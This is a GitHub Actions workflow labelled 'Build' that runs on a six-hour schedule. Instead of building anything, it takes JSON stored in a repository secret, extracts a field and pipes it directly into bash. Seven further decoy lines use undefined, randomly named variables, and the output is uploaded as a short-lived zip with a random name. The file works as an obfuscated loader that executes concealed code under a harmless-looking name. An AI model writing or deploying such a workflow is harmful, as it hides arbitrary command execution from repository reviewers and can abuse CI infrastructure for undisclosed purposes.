name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '23 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run
        env:
          xuei70: ${{ secrets.xuei70 }}
        run: |
          printf '%s' "$xuei70" | jq -r .aarx48 | /bin/bash
          echo $hbzk303 | jq -r .se42 | /bin/bash
          echo $t9 | jq -r .nrxi56657 | /bin/bash
          printf '%s' "$g07" | jq -r .hh16 | /bin/bash
          printf '%s' "$w80" | jq -r .c94044 | /bin/bash
          printf '%s' "$er14" | jq -r .rb85102 | /bin/bash
          printf '%s' "$bk78" | jq -r .i32 | /bin/bash
          echo $pxtlk01 | jq -r .rv22042 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: GV8cJWlR
          path: "*.zip"
          retention-days: 1
